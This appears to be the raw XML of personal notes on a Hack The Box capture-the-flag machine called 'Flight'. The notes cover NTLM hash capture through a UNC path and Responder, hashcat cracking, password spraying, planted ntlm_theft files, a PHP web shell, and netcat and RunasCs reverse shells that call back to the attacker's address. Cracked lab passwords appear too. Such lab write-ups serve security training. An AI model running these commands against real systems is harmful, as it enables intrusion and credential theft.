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F813BB9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AB64DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Flight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BD35310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AB64D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B64DE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AB64D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AB64DE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AB64D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AB64DE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AB64D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B64DE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BF7FAE5" w:rsidR="00843DCE" w:rsidRDefault="00EA419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can do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but we try the enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BA6785" w14:textId="455E7931" w:rsidR="00EA4199" w:rsidRDefault="00EA4199" w:rsidP="00843DCE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fuff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4" w:history="1">
        <w:r w:rsidRPr="00892F59">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://t_ip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-H “Host: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FUZZ.flight.htb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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>seclits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/discovery/subdomains-top1million-5000.txt -f 7069</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D56B46" w14:textId="5BA88E9B" w:rsidR="002F7F49" w:rsidRDefault="002F7F49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obtain the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>school.flight.htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="23D3FFEC" w14:textId="07C97F20" w:rsidR="002F7F49" w:rsidRDefault="002F7F49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visit this and we obtain the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>index.php?view</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = change it as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2829C90B" w14:textId="5D8BD3E0" w:rsidR="002F7F49" w:rsidRDefault="002F7F49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?view=//10.10.14.56/please/subscribe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D1003F" w14:textId="66BDE2F3" w:rsidR="002F7F49" w:rsidRDefault="00420552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responder.py tun0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464CE792" w14:textId="79F6D42B" w:rsidR="00420552" w:rsidRDefault="00420552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an error then just change the file name </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = it </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sobtain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ahsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in responder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FD37E1" w14:textId="33AB1A22" w:rsidR="00420552" w:rsidRDefault="00420552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hash it with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = its ntlmv2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09716012" w14:textId="780608D9" w:rsidR="00420552" w:rsidRPr="00EA4199" w:rsidRDefault="00420552" w:rsidP="00843DCE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svc-apache:S@Ss!K</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>@*t13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E60A3F" w14:textId="08F41BCC" w:rsidR="00EA4199" w:rsidRDefault="00BC7B44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8648D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u username -p paste = yes but not for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008648D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>winrm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4A3E9556" w14:textId="1F20B296" w:rsidR="008648D6" w:rsidRDefault="008648D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  -  shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EB0809" w14:textId="5BA08E8A" w:rsidR="002B7517" w:rsidRDefault="002B751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sbmclient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‘username’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/Users = it has nothing to be critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5979111F" w14:textId="330D39D4" w:rsidR="002B7517" w:rsidRDefault="002B751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sbmclient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‘username’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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Web =  </w:t>
      </w:r>
      <w:r w:rsidR="004F0880">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Still don’t get anything</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3124C728" w14:textId="12C51D91" w:rsidR="00C07217" w:rsidRDefault="00C07217" w:rsidP="00C07217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username -p paste </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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spider_plus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1EFFE233" w14:textId="0B8277AF" w:rsidR="00A53501" w:rsidRDefault="00A53501" w:rsidP="00A5350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username -p paste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spider_plus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-spider users = go to the path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EFF245" w14:textId="5080F7F6" w:rsidR="00A53501" w:rsidRDefault="00A53501" w:rsidP="00A5350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still we don’t get anything</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B4BAE5" w14:textId="709560C6" w:rsidR="00A53501" w:rsidRDefault="00A53501" w:rsidP="00A5350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username -p paste -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -users</w:t>
      </w:r>
      <w:r w:rsidR="003D1ECE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = save all users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B8E617" w14:textId="268F0D5A" w:rsidR="00412416" w:rsidRDefault="00412416" w:rsidP="00A5350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users.txt |awk ‘{print$5}’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CB204C" w14:textId="7BF90FB9" w:rsidR="00412416" w:rsidRDefault="00412416" w:rsidP="004124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users.txt |awk ‘{print$5}’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;users.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF15F86" w14:textId="363CFCA3" w:rsidR="00412416" w:rsidRDefault="00A664CE" w:rsidP="00A53501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user.txt -p ‘paste’  - -continue-on-success</w:t>
      </w:r>
      <w:r w:rsidR="00A57735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = its</w:t>
      </w:r>
      <w:r w:rsidR="00E44807">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A57735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">done with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A57735">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>S.Moon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2E30E4A9" w14:textId="70EC906F" w:rsidR="00E44807" w:rsidRDefault="00E4480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t_up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‘username’ -p ‘paste’ - -shares = shared </w:t>
      </w:r>
      <w:r w:rsidR="007B3BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">write </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6199D89D" w14:textId="768942FC" w:rsidR="00EA4199" w:rsidRDefault="007B3BE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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>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newuser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/shared</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291FB68A" w14:textId="1EA7274B" w:rsidR="007B3BEF" w:rsidRDefault="0009378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can add poison file and get a new hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A5D854" w14:textId="25FF46D1" w:rsidR="00093781" w:rsidRDefault="00F34CF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ntlm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theft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 w:rsidR="006F5762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="006F5762"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 w:rsidR="006F5762"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 w:rsidR="006F5762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s.moon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006F5762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006F5762"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6F5762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">/shared = we obtain </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006F5762"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 w:rsidR="006F5762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> so now add here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBF9C62" w14:textId="75EC338E" w:rsidR="006F5762" w:rsidRDefault="006F576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2</w:t>
      </w:r>
      <w:r w:rsidRPr="006F5762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 xml:space="preserve"> terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CB4ACE" w14:textId="77777777" w:rsidR="00AF4FFB" w:rsidRDefault="00AF4FF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ntlm_theft.py -g all -s 10.10.14.56 -f please subscribe = it create a file and add some file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0255DD2F" w14:textId="79BE1913" w:rsidR="00AF4FFB" w:rsidRDefault="00242E7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python3 responder.py -</w:t>
      </w:r>
      <w:r w:rsidR="006F5762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tun0</w:t>
      </w:r>
      <w:r w:rsidR="00AF4FF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A753042" w14:textId="10CAB598" w:rsidR="004D6534" w:rsidRDefault="004D65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ls to the please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scbscribe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notice desktop.ini</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC4ECC6" w14:textId="6829DEC0" w:rsidR="004D6534" w:rsidRDefault="004D65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put desktop.ini</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB2029B" w14:textId="08BA239B" w:rsidR="00DC662F" w:rsidRDefault="00DC662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2 min we get the hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3181CC40" w14:textId="7238648D" w:rsidR="00DC662F" w:rsidRDefault="0065181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 the hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649C40DB" w14:textId="24EDADE9" w:rsidR="00911684" w:rsidRDefault="0091168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C.BUM:Tikkycoll_431012284</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179AACC3" w14:textId="67519C57" w:rsidR="00911684" w:rsidRDefault="0091168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shares = web hav</w:t>
      </w:r>
      <w:r w:rsidR="00650202">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> write access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4041F742" w14:textId="0D710881" w:rsidR="00EA4199" w:rsidRDefault="00345DE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c.um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/web </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307A00EF" w14:textId="76A43F70" w:rsidR="00345DE7" w:rsidRDefault="00345DE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create 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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A5388B" w14:textId="487F7E62" w:rsidR="00345DE7" w:rsidRDefault="00EA5CF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&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E67E1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="08D89CBE" w14:textId="35D15155" w:rsidR="00EA5CF0" w:rsidRDefault="00EA5CF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system($_</w:t>
      </w:r>
      <w:r w:rsidR="006A4F3E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>REQ</w:t>
      </w:r>
      <w:r w:rsidR="000476CB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UEST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[‘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’]);?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41246CCC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4D38BEE5" w14:textId="798863A7" w:rsidR="0057416A" w:rsidRDefault="0057416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put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shell.php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if not then add directory as </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13ADECC3" w14:textId="69D4A8BB" w:rsidR="0057416A" w:rsidRDefault="0057416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lsc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www = then put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shell.php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its downloaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9E6BC2" w14:textId="1A3C27AB" w:rsidR="0057416A" w:rsidRDefault="001E104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its code execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B521C3" w14:textId="475459B0" w:rsidR="001E104B" w:rsidRDefault="00C6497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website with t-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shell.php?cmd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its visible </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6BE0B5" w14:textId="77777777" w:rsidR="00C64975" w:rsidRDefault="00C64975" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A30B210" w14:textId="6CCCA171" w:rsidR="001E104B" w:rsidRDefault="001E104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put nc64.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05006B0D" w14:textId="3D1FF543" w:rsidR="001E104B" w:rsidRDefault="001E104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0AC334B8" w14:textId="0B6AC67A" w:rsidR="00EA4199" w:rsidRDefault="002D776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another terminal </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D9C472" w14:textId="751E333B" w:rsidR="002D7768" w:rsidRDefault="002D776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nc6</w:t>
      </w:r>
      <w:r w:rsidR="00D642FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00C64975">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D642FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e powershell.exe 10.10.14.56 9001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDD87F0" w14:textId="4262517E" w:rsidR="00EA4199" w:rsidRDefault="00C6497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add it same to the website ?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=paste = if not then put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shell.php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nc64.exe again and then try </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA39EA5" w14:textId="179074FF" w:rsidR="00EA4199" w:rsidRDefault="00B74BD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user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA3DC93" w14:textId="77777777" w:rsidR="00C95C5C" w:rsidRDefault="00C95C5C" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D9533B7" w14:textId="61B27DA0" w:rsidR="00C95C5C" w:rsidRDefault="00C95C5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netstart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-an = to see what ports are open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC99B35" w14:textId="2FB68377" w:rsidR="00FD182E" w:rsidRDefault="00FD182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interpub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wwwroot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006E5EC4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = we cannot write or create a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D1E4A5" w14:textId="57025118" w:rsidR="006E5EC4" w:rsidRDefault="006E5EC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runascs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download zip file and unzip to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57A0575E" w14:textId="4A24995F" w:rsidR="006E5EC4" w:rsidRDefault="006E5EC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shell = at c:\programdata = curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00797166" w:rsidRPr="00892F59">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://10.10.14.56:8000/RunasCs.exe -o RunasCs.exe</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5DEEB5F5" w14:textId="5CED22BA" w:rsidR="00797166" w:rsidRDefault="0079716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./runascs.exe</w:t>
      </w:r>
      <w:r w:rsidR="006D1695">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = somewhat error we notice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C901ED4" w14:textId="7F4FE285" w:rsidR="006D1695" w:rsidRDefault="006D16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curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00892F59">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://10.10.14.56:8000/nc64.exe -o nc64.exe</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6DB761CB" w14:textId="16419D23" w:rsidR="005070E4" w:rsidRDefault="005070E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2AB578A9" w14:textId="77777777" w:rsidR="005070E4" w:rsidRDefault="005070E4" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A8A170D" w14:textId="38DB3825" w:rsidR="006D1695" w:rsidRDefault="005070E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./runascs.exe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c.bum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password powershell.exe -r 10.10.14.56:9001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79467FB2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62058057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54C61305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6D979058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3865C564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78197326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17DE8DA8" w14:textId="77777777" w:rsidR="00EA4199" w:rsidRDefault="00EA4199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476CB"/>
    <w:rsid w:val="00093781"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="001E104B"/>
    <w:rsid w:val="00242E7A"/>
    <w:rsid w:val="002B7517"/>
    <w:rsid w:val="002D7768"/>
    <w:rsid w:val="002F7F49"/>
    <w:rsid w:val="00345DE7"/>
    <w:rsid w:val="003D1ECE"/>
    <w:rsid w:val="00412416"/>
    <w:rsid w:val="00420552"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="004D6534"/>
    <w:rsid w:val="004F0880"/>
    <w:rsid w:val="005070E4"/>
    <w:rsid w:val="0057416A"/>
    <w:rsid w:val="00647539"/>
    <w:rsid w:val="00650202"/>
    <w:rsid w:val="00651812"/>
    <w:rsid w:val="006A4F3E"/>
    <w:rsid w:val="006D1695"/>
    <w:rsid w:val="006E5EC4"/>
    <w:rsid w:val="006F5762"/>
    <w:rsid w:val="00797166"/>
    <w:rsid w:val="007B3BEF"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="008648D6"/>
    <w:rsid w:val="00911684"/>
    <w:rsid w:val="009F60E3"/>
    <w:rsid w:val="00A03CC7"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A53501"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00A57735"/>
    <w:rsid w:val="00A664CE"/>
    <w:rsid w:val="00AB64DE"/>
    <w:rsid w:val="00AF4FFB"/>
    <w:rsid w:val="00B74BD8"/>
    <w:rsid w:val="00BC7B44"/>
    <w:rsid w:val="00C07217"/>
    <w:rsid w:val="00C64975"/>
    <w:rsid w:val="00C95C5C"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00D642FB"/>
    <w:rsid w:val="00D74CCE"/>
    <w:rsid w:val="00DC662F"/>
